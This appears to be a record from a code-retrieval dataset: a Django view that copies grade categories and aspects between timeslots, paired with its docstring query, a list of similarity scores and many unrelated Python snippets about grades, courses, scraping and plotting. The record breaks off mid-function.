descriptors:\\n\"\r\n msg += \"length=%d\\n\" % len(gcontext['all_descriptors'])\r\n msg = '<pre>%s</pre>' % msg.replace('<', '&lt;')\r\n return msg", "def categories(self):\r\n return self.q(css='span.rubric-category').text", "def amenities(self):\n G, mapping = self.network()\n waste = []\n resources = []\n intmed_products = []\n\n for nd in G:\n # if nd[0] != \"r\":\n if not isinstance(nd, int):\n if not G.in_edges(nd):\n resources.append(nd)\n elif not G.out_edges(nd):\n if nd != self.commodity:\n waste.append(nd)\n else:\n intmed_products.append(nd)\n\n return waste, resources, intmed_products", "def __ui_statistics_sort_avg(self, discipline_name):\n try:\n sorted_list = self.__grade_controller.get_averages_at_discipline_sorted_descending(discipline_name)\n if len(sorted_list) == 0:\n print(\"There is no student graded at the given discipline!\")\n return\n\n for student in sorted_list:\n print(str(student) + \"\\n\")\n\n except GradeException as ge:\n print(ge)\n return", "def getWismLogsByCategory():\n\tstats = {}\n\tfacDico = {}\n\ttry:\n\t\tfacDico = json.load(open(settings.FACILITIESDICO))\n\texcept:\n\t\tpass\n\n\t## Logs More important than informational (level 5 at least)\n\tlogs = WismEvent.objects.filter(severity__lte=5)\n\tcategories = set(logs.values_list('category', flat=True))\n\tfor cat in categories:\n\t\ttmp = logs.filter(category=cat).count()\n\t\t\n\t\tif cat in facDico:\n\t\t\tcat = facDico[cat]\n\n\t\tstats[cat] = tmp\n\n\treturn stats", "def get_category_list():\n return Category.objects.filter(active=True)", "def scrape_grades(self, cycle=0):\r\n cell_1_text = f\"{self.cell_name}{cycle}_c0\"\r\n cell_2_text = f\"{self.cell_name}{cycle}_c1\"\r\n cell_1 = self.web_driver.find_element_by_id(cell_1_text).text\r\n cell_2 = self.web_driver.find_element_by_id(cell_2_text).text\r\n\r\n if cell_1 == \"\":\r\n return \"\"\r\n\r\n class_name = \"\"\r\n for char in cell_1:\r\n if char == \" \" or len(class_name) > 9:\r\n break\r\n else:\r\n class_name += char\r\n\r\n grade = \"\"\r\n for char in cell_2:\r\n if char.isdigit() or char == \".\":\r\n grade += char\r\n\r\n grades = self.scrape_grades(cycle=cycle+1)\r\n new_grade = [class_name, grade]\r\n\r\n if grades == \"\":\r\n return [new_grade]\r\n\r\n self.write_log(f\"Class: {class_name} Grade: {grade}\")\r\n grades.append(new_grade)\r\n return grades", "def get_assignments_for_agenda(schedule):\n return SchedTimeSessAssignment.objects.filter(\n schedule__in=[schedule, schedule.base],\n session__on_agenda=True,\n )", "def getMeasures():", "def attribute_name_marge(self, attribute, category):\n for i in self.response_info['results']:\n if category != 'films':\n self.get_output[i['name']] = i[attribute]\n else:\n self.get_output[f\"title: {i['title']}\"] = i[attribute]\n self.counter += 1", "def what_is_the_grade(self):\n\t\treturn_dict = {\n\t\t\t'section_title': self.title, \n\t\t\t'section_weight': self.weight,\n\t\t\t'grade_value' : self.current_grade_value,\n\t\t\t'comment_text' : self.current_comment_text,\n\t\t\t'default_comments_text' : self.current_default_comment_text,\n\t\t\t'example_comments_text' : self.current_example_comment_text,\n\t\t\t'is_complete': self.is_complete\n\t\t}\n\n\t\treturn return_dict", "def all_problem_grade_distribution(request, course_id):\r\n json = {}\r\n\r\n # Only instructor for this particular course can request this information\r\n if has_instructor_access_for_class(request.user, course_id):\r\n try:\r\n json = dashboard_data.get_d3_problem_grade_distrib(course_id)\r\n except Exception as ex: # pylint: disable=broad-except\r\n log.error('Generating metrics failed with exception: %s', ex)\r\n json = {'error': \"error\"}\r\n else:\r\n json = {'error': \"Access Denied: User does not have access to this course's data\"}\r\n\r\n return HttpResponse(simplejson.dumps(json), mimetype=\"application/json\")", "def get_sample_acls(self, ctx, params):\n # ctx is the context object\n # return variables are: acls\n #BEGIN get_sample_acls\n id_ = _get_id_from_object(params, 'id', required=True)\n admin = _check_admin(\n self._user_lookup, ctx[_CTX_TOKEN], _AdminPermission.READ,\n # pretty annoying to test ctx.log_info is working, do it manually\n 'get_sample_acls', ctx.log_info, skip_check=not params.get('as_admin'))\n acls_ret = self._samples.get_sample_acls(id_, _UserID(ctx[_CTX_USER]), as_admin=admin)\n acls = _acls_to_dict(acls_ret)\n #END get_sample_acls\n\n # At some point might do deeper type checking...\n if not isinstance(acls, dict):\n raise ValueError('Method get_sample_acls return value ' +\n 'acls is not type dict as required.')\n # return the results\n return [acls]", "def detail_assignmentype(request, pk):\n prof = request.user.prof\n context = {'prof': prof}\n assignmentype = Assignmentype.objects.filter(pk=pk, prof=prof).first()\n assignments = assignmentype.assignment_set.\\\n annotate(std=StdDev('evalassignment__grade_assignment'),\n mean=Avg('evalassignment__grade_assignment'))\n if assignmentype:\n context['assignmentype'] = assignmentype\n context['assignments'] = assignments\n context['range_grades'] = range(assignmentype.nb_grading)\n return render(request, 'gradapp/detail_assignmentype.html',\n context)\n else:\n return redirect('gradapp:list_assignmentypes_running')", "def inspect_achievement(achievements, entity_type, entity, dirty_fields):\n\n # Getting only achievements that have sense to be checked\n achievements = achievements.filter(\n entity_type=entity_type,\n requirements__key__in=dirty_fields.keys()\n # NOTE: Excluding unlocked achievements\n ).exclude(\n id__in=entity.achievements.values_list('achievement_id', flat=True)\n ).distinct()\n\n # Inspecting\n for achievement in achievements:\n achievement.logic.inspect(entity)", "def print_output(filtered_courses_list):\n\n if not filtered_courses_list:\n print(\"No courses matched the query.\")\n return\n\n max_name_length = max([len(course.name) for course in filtered_courses_list])\n\n print(\" Sem | Course ID | Pts | \" +\n \" \" * ((max_name_length - 11) // 2 + (max_name_length - 1) % 2) + \"Course Name\" + \" \" * ((max_name_length - 11) // 2) +\n \" | Grade\")\n print(\"______|___________|_____|\" + \"_\" * (max_name_length + 2) + \"|______\")\n\n for course in filtered_courses_list:\n print(str(course.year) + course.semester, end=\" | \")\n print(course.cid, end=\" | \")\n print(course.creditpts, end=\" | \")\n print(course.name, end=\" \" * (max_name_length - len(course.name) + 1) + \"| \")\n\n print(course.grade)\n\n print(\"\\nGPA: \" + (\"%.3f\" % calculate_weighted_average(filtered_courses_list)))", "def show_events_in_category(self, category):\n event_names = []\n self._load_all_events()\n for name, events in self._events.items():\n if not events:\n continue\n if events[0].category == category:\n event_names.append(name)\n\n if not event_names:\n print(f\"There are no events in category {category}\")\n return\n\n for event_name in sorted(event_names):\n self.show_events(event_name)", "def exploreAisle(self):\n clear()\n print(print_banner(self.name))\n\n # Seperate the items into different dataframes for categories\n self.aisle_data, self.aisle_name, self.category_num = self.stock.showCategory(\"You see a sign point to different aisles\", \"Which aisle do you go down?\\n\", True)\n if self.aisle_name == 0:\n self.exit = False\n else:\n self.aisle_data = self.aisle_data[[\"Item\", \"Price\", \"Stock\"]]", "def show_event_categories(self):\n print(\"Catgories: {}\".format(\" \".join(self.list_unique_categories())))", "def _fetch_air_quality_routine(self, day):\n super()._fetch_air_quality_routine(day)\n\n res = requests.get( \n 'http://www.arpa.puglia.it/pentaho/ViewAction',\n params = [\n ('DATAINIZIO', day.strftime('%Y%d%m')),\n ('DATAFINE', day.strftime('%Y%d%m')),\n ('type', 'csv'),\n (':', day.strftime('%Y')),\n ('solution', 'ARPAPUGLIA'),\n ('action', 'meta-aria.xaction'),\n ('path', 'metacatalogo')\n ]\n )\n \n parsed_csv = list(csv.reader(res.text.split('\\n'), delimiter=';'))[9:]\n\n for province in self.provinces:\n province_data = [x for x in parsed_csv if len(x) > 2 and x[2] == province.name]\n \n for indicator, key in self.indicator_map.items():\n values = [self.extract_float(x[5]) for x in province_data \n if x[4] == key and self.extract_float(x[5]) is not None]\n \n if len(values) > 0:\n setattr(province.quality, indicator, round(mean(values), 2))\n \n if self.on_quality_fetched is not None: self.on_quality_fetched(self)", "def by_category(self, start_date, end_date, **kwargs):\n data = self.by_date(start_date, end_date)\n\n return data.values('category__name').annotate(count=models.Count('value')).order_by('category')", "def get_grades(session): \n res = _get_grades_step_0(session)\n dossier_path = re.search('href=\"([\\/a-zA-Z0-9\\.]*)\" title=\"Mon dossier\"', res).group(1)\n\n print(\"[STEP 0] got dossier path: \" + dossier_path)\n\n res = _get_grades_step_1(session, dossier_path)\n\n # Get the list of years available (1A, 2A, 3A) and their identifiers\n res = _get_grades_step_2(session)\n rgx = re.finditer(r'''<u>([A-Z\\/0-9]*)<\\/u><\\/a><\\/td><td width=\"30%\"><a href=\"#\" onclick=\"return oamSubmitForm\\('([a-zA-Z0-9_]*)','([a-zA-Z0-9_:]*)',null,\\[\\['row','([0-9]*)'\\]\\]\\);\" id=\"([a-zA-Z0-9_:]*)\">([a-zA-Z0-9 ]*)<\\/a>''', res)\n\n years = []\n for match in rgx:\n years.append({\n \"id\": match.group(1),\n \"name\": match.group(6),\n \"param\": match.group(2),\n \"paramval\": match.group(5),\n \"row\": match.group(4)\n })\n\n print(\"[STEP 2] got years:\", years)\n\n year_grades = []\n for year in years:\n res = _get_grades_step_3(session, year)\n\n soup = BeautifulSoup(res, 'html.parser')\n table = soup.find('table', attrs={'class':'portlet-table'})\n table_body = table.find('tbody')\n rows = table_body.find_all('tr')\n\n rawgrades = []\n for row in rows:\n cols = row.find_all('td')\n cols = [ele.text.strip() for ele in cols]\n\n data = []\n for ele in cols:\n if ele:\n data.append(ele)\n\n rawgrades.append(data)\n\n grades = []\n gradergx = re.compile('^[0-9]{1,2}$')\n for line in rawgrades:\n if len(line) == 3 and gradergx.match(line[2]):\n grades.append({\n \"module_code\": line[0],\n \"module_name\": line[1],\n \"module_grade\": int(line[2])\n })\n\n print(\"[STEP 3] got {nb} modules with grades for year {year}\".format(\n nb=len(grades), year=year['name']))\n\n year_grades.append({\n 'year':{'id': year['id'], 'label': year['name']},\n 'grades': grades,\n 'raw': rawgrades\n })\n\n return year_grades", "def students(self):\n\t\treturn self.grade_set.all().distinct()", "def get_topics(category):\n page = requests.get(BASE_URL, verify=False)\n soup = BeautifulSoup(page.content)\n output = []\n get_lesson_id = lambda url: url.split('=')[-1]\n\n if category == 'Top 10 Courses':\n playlist = soup.find(id='featured_playlists')\n for item in playlist.findAll('div', 'item'):\n link = item.find('a', 'featured-playlist-title')\n output.append({\n 'thumbnail': item.find('img').get('src'),\n 'title': link.text.replace('&nbsp;', '').strip(),\n 'lesson_id': get_lesson_id(link['href'])})\n else:\n sidebar = soup.find(id='main_aside')\n for dl in sidebar.findAll('dl'):\n if dl.find('h4').text == category:\n for item in dl.findAll('dd'):\n link = item.find('a', 'category-name')\n output.append({\n 'title': link.getText(' '),\n 'lesson_id': get_lesson_id(link['href'])})\n\n return output", "def get_possible_timeframes(level: str, section_type: str,\n student_obj, section_table) -> Set[int]:\n set_choices = dict()\n for st in SECTION_NAME_MAPPING.keys():\n section_id = student_obj.__getattribute__(f'{st}_info_id')\n if section_id: # section has been started\n set_choices[st] = int(section_table.row_dict[section_id].activity_timescale) // 30\n else:\n set_choices[st] = None\n\n if level == 'bronze':\n if 6 in set_choices.values(): # one section already on 6 months\n return {3} # only choice left is 3 months\n else:\n return {3, 6}\n\n elif level == 'silver':\n if section_type == 'vol':\n return {6}\n elif section_type == 'skill':\n if set_choices['phys'] == 3:\n return {6}\n elif set_choices['phys'] == 6:\n return {3}\n else:\n return {3, 6}\n elif section_type == 'phys':\n if set_choices['skill'] == 3:\n return {6}\n elif set_choices['skill'] == 6:\n return {3}\n else:\n return {3, 6}\n\n elif level == 'gold':\n if section_type == 'vol':\n return {12}\n elif section_type == 'skill':\n if set_choices['phys'] == 6:\n return {12}\n elif set_choices['phys'] == 12:\n return {6}\n else:\n return {6, 12}\n elif section_type == 'phys':\n if set_choices['skill'] == 6:\n return {12}\n elif set_choices['skill'] == 12:\n return {6}\n else:\n return {6, 12}", "def test_getCategoryValues(self):\r\n smpl_ids = ['PC.354', 'PC.355', 'PC.356', 'PC.481', 'PC.593', 'PC.607',\r\n 'PC.634', 'PC.635', 'PC.636']\r\n\r\n exp = [\r\n 'Control',\r\n 'Control',\r\n 'Control',\r\n 'Control',\r\n 'Control',\r\n 'Fast',\r\n 'Fast',\r\n 'Fast',\r\n 'Fast']\r\n obs = self.overview_map.getCategoryValues(smpl_ids, 'Treatment')\r\n self.assertEqual(obs, exp)", "def dump_grading_context(course):\r\n hbar = \"{}\\n\".format(\"-\" * 77)\r\n msg = hbar\r\n msg += \"Course grader:\\n\"\r\n\r\n msg += '%s\\n' % course.grader.__class__\r\n graders = {}\r\n if isinstance(course.grader, xmgraders.WeightedSubsectionsGrader):\r\n msg += '\\n'\r\n msg += \"Graded sections:\\n\"\r\n for subgrader, category, weight in course.grader.sections:\r\n msg += \" subgrader=%s, type=%s, category=%s, weight=%s\\n\"\\\r\n % (subgrader.__class__, subgrader.type, category, weight)\r\n subgrader.index = 1\r\n graders[subgrader.type] = subgrader\r\n msg += hbar\r\n msg += \"Listing grading context for course %s\\n\" % course.id.to_deprecated_string()\r\n\r\n gcontext = course.grading_context\r\n msg += \"graded sections:\\n\"\r\n\r\n msg += '%s\\n' % gcontext['graded_sections'].keys()\r\n for (gsomething, gsvals) in gcontext['graded_sections'].items():\r\n msg += \"--> Section %s:\\n\" % (gsomething)\r\n for sec in gsvals:\r\n sdesc = sec['section_descriptor']\r\n frmat = getattr(sdesc, 'format', None)\r\n aname = ''\r\n if frmat in graders:\r\n gform = graders[frmat]\r\n aname = '%s %02d' % (gform.short_label, gform.index)\r\n gform.index += 1\r\n elif sdesc.display_name in graders:\r\n gform = graders[sdesc.display_name]\r\n aname = '%s' % gform.short_label\r\n notes = ''\r\n if getattr(sdesc, 'score_by_attempt', False):\r\n notes = ', score by attempt!'\r\n msg += \" %s (format=%s, Assignment=%s%s)\\n\"\\\r\n % (sdesc.display_name, frmat, aname, notes)\r\n msg += \"all descriptors:\\n\"\r\n msg += \"length=%d\\n\" % len(gcontext['all_descriptors'])\r\n msg = '<pre>%s</pre>' % msg.replace('<', '&lt;')\r\n return msg", "def list_spectrographs(self) -> None:\n for key, item in self.spectrographs.items():\n item.summary()\n print(\"\\n\")", "def make_recommendation_ga(playlist):\n tracklist = []\n\n # tracknames = list(playlist['name'])\n print(playlist.head())\n\n track_features = playlist[['danceability', 'energy']]\n # 'speechiness', 'acousticness',\n # 'instrumentalness', 'liveness', 'valence']]\n\n track_features_matrix = track_features.values\n\n path, fitness = ga.genetic_algorithm(track_features_matrix, plot=False)\n\n visualization.plot_path(\n track_features,\n path,\n fitness,\n mode=\"none\",\n keep=True\n )\n\n return tracklist", "def get_course(data):\n\n return {item['course'] for item in data}", "def ratings(self):\n session = Session.object_session(self)\n return session.query(Rating).join(Section).filter(Section.professor == self).all()" ]
[ "0.5233529", "0.5082282", "0.5039836", "0.49076796", "0.49012667", "0.4887644", "0.4880797", "0.48579165", "0.48460177", "0.4806707", "0.48065493", "0.47938785", "0.478363", "0.47725368", "0.47473636", "0.47454002", "0.47437078", "0.47360337", "0.47296265", "0.47234464", "0.47124693", "0.4704325", "0.4670285", "0.4658767", "0.46473724", "0.46345207", "0.46278307", "0.4606785", "0.4601236", "0.45969978", "0.45814225", "0.4550597", "0.45451537", "0.4543668", "0.45379758", "0.4535296", "0.45124856", "0.4507776", "0.4507384", "0.45023355", "0.4496329", "0.44873083", "0.44694552", "0.4466978", "0.4464146", "0.4456392", "0.44497317", "0.44431347", "0.44416052", "0.4440245", "0.44283047", "0.44207054", "0.44156593", "0.4414056", "0.44111884", "0.44047612", "0.44020358", "0.4394901", "0.43924618", "0.4389756", "0.43881667", "0.43838963", "0.43759596", "0.4368193", "0.43647772", "0.436457", "0.43604934", "0.43584722", "0.43584123", "0.43576622", "0.43562186", "0.43546453", "0.4353563", "0.4348825", "0.43429196", "0.43417495", "0.43388304", "0.43367106", "0.43347824", "0.43342176", "0.43321723", "0.43116432", "0.43106812", "0.43023401", "0.4295946", "0.42853454", "0.42852294", "0.4283868", "0.4282433", "0.42797568", "0.4279478", "0.42788708", "0.4278847", "0.42763335", "0.42757496", "0.42746866", "0.42721537", "0.42700535", "0.42652455", "0.4259139" ]
0.71396613
0
Show a list of timeslots to import grades from.
def copy(request, pk=None): # do a copy if pk: ts = get_object_or_404(TimeSlot, pk=pk) if ts == get_timeslot(): raise PermissionDenied("It is not possible to copy the grades from the current timeslot.") if get_timeslot().gradecategories.exists(): return render(request, 'base.html', { 'Message': "The current timeslot already has grade categories." " Importing is not possible. " "Please remove the categories in the current timeslot before copying.", 'return': 'results:list_categories'}) if request.method == 'POST': form = ConfirmForm(request.POST) if form.is_valid(): for cat in ts.gradecategories.all(): old_id = cat.id old_aspects = cat.aspects.all() cat.id = None cat.TimeSlot = get_timeslot() cat.save() for aspect in old_aspects: aspect.id = None aspect.Category = cat aspect.save() return render(request, 'base.html', {'Message': 'Finished importing!', 'return': 'results:list_categories'}) else: form = ConfirmForm() return render(request, 'GenericForm.html', { 'form': form, 'formtitle': 'Confirm copy grade categories and aspects', 'buttontext': 'Confirm' }) # list possible timeslots to copy from else: tss = TimeSlot.objects.filter(gradecategories__isnull=False).distinct() return render(request, "results/list_copy.html", { "tss": tss, 'ts': get_timeslot(), })
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def show_grades(state, from_dir):\n grading_manager = GradingManager(state.get_assignment(), from_dir)\n print_grades(grading_manager.grades(), state.user_name)", "def show_time(self):\n hour = str(datetime.datetime.now().strftime(\"%H\"))\n minute = str(datetime.datetime.now().strftime(\"%M\"))\n\n hour1 = int(hour[0])\n hour2 = int(hour[1])\n minute1 = int(minute[0])\n minute2 = int(minute[1])\n\n self.light_number(self.numbers[hour1], [0, 5])\n self.light_number(self.numbers[hour2], [0, 0])\n self.light_number(self.numbers[minute1], [5, 5])\n self.light_number(self.numbers[minute2], [5, 0])", "def show_runs(self,start=0,end=99999999,csv=False):\n if csv:\n print '{:>7}, {:>10}, {:>8}, {:>10}, {:3}, {:2}'.format('Run', \n 'Day', 'Time', 'Length', 'xtc', 'h5') \n \n else:\n print '='*72\n print 'Experiment {:}'.format(self.exp)\n print ' xtc dir {:}'.format(self.xtc_dir)\n print ' hdf5 dir {:}'.format(self.h5_dir)\n print '-'*72\n print '{:>7} {:>10} {:>8} {:>10} {:3} {:2}'.format('Run', 'Day', 'Time', \n 'Length', 'xtc', 'h5') \n print '-'*72\n \n for item in self.runs:\n run = item['num']\n if run >= start and run <= end:\n datestr = time.strftime('%Y-%m-%d',\n time.localtime(item['begin_time_unix']))\n timestr = time.strftime('%H:%M:%S',\n time.localtime(item['begin_time_unix']))\n if len(item['xtc_files']) > 0:\n xtc = 'xtc'\n else:\n xtc = ''\n \n if len(item['h5_files']) > 0:\n h5 = 'h5'\n else:\n h5 = ''\n \n begin_time = item['begin_time_unix']\n end_time = item['end_time_unix'] \n if end_time:\n dtime = end_time - begin_time\n flag = ' '\n else:\n dtime = time.time() - begin_time\n flag = '*'\n\n dmin = int(dtime/60)\n dsec = int(dtime % 60)\n if dmin > 0:\n dtstr = '{:4}m {:02}s'.format(dmin,dsec)\n else:\n dtstr = '{:02}s'.format(dsec)\n\n if csv:\n print '{:7}, {:10}, {:8}, {:>10}, {:3}, {:2}'.format(run,\n datestr, timestr, dtstr, xtc, h5)\n else:\n print '{:7} {:10} {:8} {:>10} {:3} {:2}'.format(run,\n datestr, timestr, dtstr, xtc, h5)\n\n if flag in '*':\n print '* Currently Acquiring Data for Run {:}'.format(run)", "def timesheet_all(request):\r\n return render(\r\n request,\r\n 'timesheet/timesheet_all.html'\r\n )", "def tests():\n dates, times = report_date_time()\n return render_template('tests.html',\n unit_date=dates[0], unit_time=times[0],\n integ_date=dates[1], integ_time=times[1])", "def timesheet(request):\r\n return render(\r\n request,\r\n 'timesheet/timesheet.html'\r\n )", "def display_imported_players(players_id_list):\r\n for player_id in players_id_list:\r\n print(players_table.get(doc_id=player_id))", "def print_time_statistics(times, func_names):\n headers = ['Name', 'Min', 'Mean', 'Median', 'Stdev', 'Max']\n rows = []\n for name, func_time in zip(func_names, times):\n rows.append(\n [name,\n min(func_time),\n statistics.mean(func_time),\n statistics.median(func_time),\n statistics.stdev(func_time) if len(func_time) > 1 else 0.0,\n max(func_time)])\n print(tabulate.tabulate(\n rows, headers=headers, floatfmt='.4f', tablefmt='github'))", "def printAll():\n data = load_yield_data()\n numberColumns = 5\n firstEntry = 'tmax5'\n lastEntry = 'lstmax9'\n colNames = list(data)\n firstIndex =colNames.index(firstEntry)\n lastIndex = colNames.index(lastEntry)\n numberTypesOfVariables = 5\n months = 5\n f, axarr = plt.subplots(numberTypesOfVariables, months)\n variables = ['tave5', 'tave6', 'tave7', 'tave8', 'tave9', 'vpdave5', 'vpdave6', 'vpdave7', 'vpdave8', 'vpdave9', 'precip5', 'precip6', 'precip7', 'precip8', 'precip9', 'evi5', 'evi6', 'evi7', 'evi8', 'evi9', 'lstmax5', 'lstmax6', 'lstmax7', 'lstmax8', 'lstmax9']\n print(firstIndex, lastIndex)\n print(colNames)\n for i in range(len(variables)):\n axarr[int(i/numberColumns), int(i%numberColumns)].plot(data[variables[i]], data[\"yield_rainfed_ana\"],'bx')\n axarr[int(i/numberColumns), int(i%numberColumns)].set_title([variables[i]])\n Z = lowess(data['yield_rainfed_ana'], data[variables[i]],frac=0.3,it=3)\n axarr[int(i/numberColumns), int(i%numberColumns)].plot(Z[:,0], Z[:,1], 'g-', lw=5)\n plt.show()", "def list_lots(self):\n table = Table(\n 5,\n headers=['Short Name', 'Date', 'Cost', 'Gain', 'Gain%'],\n coltypes=['str', 'str', 'dollars', 'delta_dollars', 'percentage'])\n for account in self.accounts():\n for asset in account.assets():\n if hasattr(asset, 'list_lots'):\n lots = asset.list_lots()\n assert (\n lots.headers()\n == ['Date', 'Quantity', 'Cost', 'Gain', 'Gain%'])\n for lot in lots.list():\n table.add_row([asset.short_name()] + lot[:1] + lot[2:])\n return table", "def additional_times(request, dj_id):\n\n\tdj_id = int(dj_id)\n\tdj = BaseUser.objects.filter(id=dj_id).first()\n\n\tshow = Show.objects.filter(dj=dj).first()\n\n\t# This will be used to display the user's previous choices so that they won't resubmit the same\n\t# time slots\n\tif show:\n\t\tchoices = Choice.objects.filter(show=show)\n\telse:\n\t\tchoices = []\n\n\treturn render(request, 'additional_times.html', {\n\t\t'dj': dj,\n\t\t'choices': choices\n\t})", "def showLevels(self):\n\n pa = 'EUR_USD GBP_USD AUD_USD USD_CAD USD_CHF NZD_USD'.split(' ')\n gr = 'D H4 H1 M30 M15'.split(' ')\n for i in xrange(len(pa)):\n dfs = p.DataFrame()\n for j in xrange(len(gr)):\n try:\n training = self.viewTraining(pa[i], gr[j])\n df = training[0]\n manifest = training[1]\n dfs = dfs.combine_first(manifest.set_index('timeframe'))\n plot(df.get_values())\n except: \n ''\n try:\n dfs['timeframe'] = dfs.index # save the lost field before calling set_index()\n print dfs.set_index('forecast').sort(ascending=False)\n except: ''\n dfp = p.read_csv('/ml.dev/bin/data/oanda/ticks/{0}/{0}-M5.csv'.format(pa[i])).sort(ascending=True).tail(50).ix[:,'closeAsk']\n plot(dfp)\n title('{0} Forecast'.format(pa[i]))\n legend(gr)\n show();\n #break", "def view_student_gradebook():\n\n user_id = session.get('user_id')\n courses = []\n grades = []\n con = db.get_db()\n cur = con.cursor()\n\n cur.execute(\"\"\"SELECT DISTINCT courses.course_id, (ROUND(sum(grades.points_received)/sum(grades.total_points), 2 )*100)\n as total_grade, roster.session_id as class_session,\n courses.name as class_name, users.name AS teacher_name, grades.student_id\n FROM courses JOIN sessions on courses.course_id = sessions.course_id\n\t\t\t\t JOIN users on courses.teacherid= users.id\n JOIN assignments on assignments.session_id = sessions.id\n JOIN grades on grades.assignment_id = assignments.assignment_id\n JOIN roster on roster.session_id = sessions.id\n WHERE grades.student_id = %s\n\t GROUP BY grades.student_id, roster.session_id, courses.course_id, users.id\"\"\",\n (user_id,))\n courses = cur.fetchall()\n\n cur.close()\n con.close()\n\n return render_template(\"/layouts/gradebook/student_view.html\", courses=courses)", "def display_time(time_spent, results):\n\n time_list = results.split(',')\n\n if time_list[2] == time_spent:\n print('Date : {}'.format(time_list[0]))\n print('Title : {}'.format(time_list[1]))\n print('Time Spent : {}'.format(time_list[2]))\n print('Notes : {}'.format(time_list[3]))\n clear()", "def do_ls_table(tpath):\n table = provider.get_type_table(tpath)\n try:\n runs = run.split('-')\n ass = provider.get_assignment(tpath, runs[0], var)\n except:\n print \"no entry found\"\n return\n print \"run range:\", \"{0}-{1}\".format(ass.run_range.min, ass.run_range.max)\n print \"variation:\", ass.variation.name\n print \"modified:\", ass.modified\n print \"comment:\", ass.comment\n print \"author:\", ass.author.name", "def display_result(ilist):\n r = \"1min Interval Report:\\n\\n\"\n r += \"Deck\\tCount\\t% Total\\t% in Learn\\n\"\n for l in ilist:\n r += \"%s\\t%d\\t%0.1f\\t%0.1f\\n\" % (l[0], l[1], l[2], l[3])\n showText(r)", "def display_time_stats(self):\n\n self.time_frame = stat_display_labels(\n self.stats_frame,\n \"Time Stats\",\n [\n \"The busiest month was:\",\n \"The busiest day of the week was:\",\n \"The busiest start hour was:\",\n ],\n row=0,\n columnspan=2,\n )\n self.time_stats_data = tk.Label(self.time_frame, justify=\"left\")\n self.time_stats_data.grid(row=0, column=2)", "def plot_table(timestamps: dict, threadList: list, mList: list) -> None:\n plt.plot(threadList, timestamps.values(), 'o-')\n plt.legend(mList, title = 'Total valores', loc='best', bbox_to_anchor=(0.5, 0., 0.5, 0.5))\n plt.xlabel('Número de processos')\n plt.ylabel('Tempo de Execução (s)')\n plt.title('Tempo de Execução por Total de Processos e Valores')\n plt.show()", "def dump_lots(args: argparse.Namespace) -> None:\n engine = create_engine()\n dump_csv(\n engine,\n dtstart=args.dtstart,\n dtend=args.dtend,\n dtstart_gains=datetime.max,\n consolidate=args.consolidate,\n lotloadfile=args.loadcsv,\n lotdumpfile=args.file,\n )", "def __ui_list_grades_by_student(self):\n student_id = input(\"Give student ID: \")\n try:\n list_of_grades = self.__grade_controller.get_grades_by_student(student_id)\n if len(list_of_grades) == 0:\n print(\"Student doesn't have any grade.\")\n return\n\n for g in list_of_grades:\n print(str(g))\n\n except GradeException as ge:\n print(ge)\n return", "def visualise_hourly_arrivals_at_each_lab(tests_dataframe):\r\n labs_df = create_dataframe_from_csv('labs.csv')\r\n labs_df = drop_missing_values_in_dataframe(labs_df)\r\n list_of_labs = labs_df['lab_name'].to_list()\r\n for lab_name in list_of_labs:\r\n df = tests_dataframe.loc[tests_dataframe['lab_name'] == lab_name]\r\n df.time_test_arrives_lab = pd.to_datetime(df.time_test_arrives_lab)\r\n df = df.sort_values(by=\"time_test_arrives_lab\")\r\n df = df[['time_test_arrives_lab']]\r\n df = df.reset_index().set_index('time_test_arrives_lab')\r\n df = df.resample('H').count()\r\n df.plot(title = 'hourly arrivals at ' + lab_name)\r\n plt.show()", "def print_list(schedule):\n START_TIME = 0\n END_TIME = 1\n MEETING_TITLE = 2\n print(\"\\nYour schedule for the day:\")\n if len(schedule) == 0:\n print(\"(empty)\\n\")\n else:\n for row in schedule:\n print(\n f\"{row[START_TIME]} - {row[END_TIME]} {row[MEETING_TITLE]}\")\n print(\"\\n\")", "def Chart3PTL(tickerListing, years=5, verbose_mode=False): \n List = tickerListing.split()\n chatty = verbose_mode\n for i in List:\n print(i)\n PlotTimeSeries(i, years, verbose_mode=chatty)", "def show_plot(times, zones, combined, labels):\r\n\r\n #Inform user of current action\r\n print(\"Loading plots...\")\r\n\r\n #If less than 25 aggregated data points, draw bar plots\r\n if len(times) < 25:\r\n plot_drawer = draw_bar_plot\r\n #Else, draw line plots\r\n else:\r\n plot_drawer = draw_line_plot\r\n\r\n #If zone energy usage should be shown combined, draw combined plot\r\n if combined:\r\n draw_combined(times, zones, plot_drawer, labels)\r\n #Else, draw plots for each zone\r\n else:\r\n draw_zones(times, zones, plot_drawer, labels)\r\n\r\n\r\n #Print instructions for how to continue\r\n print(\"Close plots window to continue...\", end=\"\\n\\n\")\r\n\r\n\r\n #Show finished plot\r\n #NOTE: Blocks thread until GUI is closed\r\n plt.show()", "def get_times():\n global times\n global times_list\n base_url = \"http://www.crawleymosque.com/\"\n r = requests.get(base_url)\n soup = BeautifulSoup(r.text, features=\"html.parser\")\n\n times_list = []\n for salah_time in soup.find_all(class_=\"prayer-start\"):\n times_list.append(salah_time.contents[0].strip())\n\n print(times_list)\n times = []\n for i in times_list:\n datetime_object = datetime.strptime(i, \"%I:%M %p\")\n just_time = datetime.time(datetime_object)\n times.append(just_time)\n\n print(times)\n\n # spam = Label(root, text=\"checking for spam\")\n # spam.place(x=460, y=110)", "def main():\n\n students = [\"Chris\", \"Jesse\", \"Sally\"]\n grades = [90, 80, 70]\n print_gradebook(students, grades)", "def print_grades(grades_input):\n for grade in grades_input:\n print grade", "def printOffByOne():\n data = load_yield_data()\n numberColumns = 5\n firstEntry = 'tmax5'\n lastEntry = 'lstmax9'\n colNames = list(data)\n firstIndex =colNames.index(firstEntry)\n lastIndex = colNames.index(lastEntry)\n numberTypesOfVariables = 5\n months = 5\n variables = ['tave5', 'tave6', 'tave7', 'tave8', 'tave9', 'vpdave5', 'vpdave6', 'vpdave7', 'vpdave8', 'vpdave9', 'precip5', 'precip6', 'precip7', 'precip8', 'precip9', 'evi5', 'evi6', 'evi7', 'evi8', 'evi9', 'lstmax5', 'lstmax6', 'lstmax7', 'lstmax8', 'lstmax9']\n variables = ['tave5', 'tave6', 'tave7', 'tave8', 'tave9', 'vpdave5', 'vpdave6', 'vpdave7', 'vpdave8', 'vpdave9', 'precip5', 'precip6', 'precip7', 'precip8', 'precip9', 'evi5', 'evi6', 'evi7', 'evi8', 'evi9', 'lstmax5', 'lstmax6', 'lstmax7', 'lstmax8', 'lstmax9']\n print(firstIndex, lastIndex)\n print(colNames)\n for i in range(len(variables)):\n plt.plot(data[variables[i]], 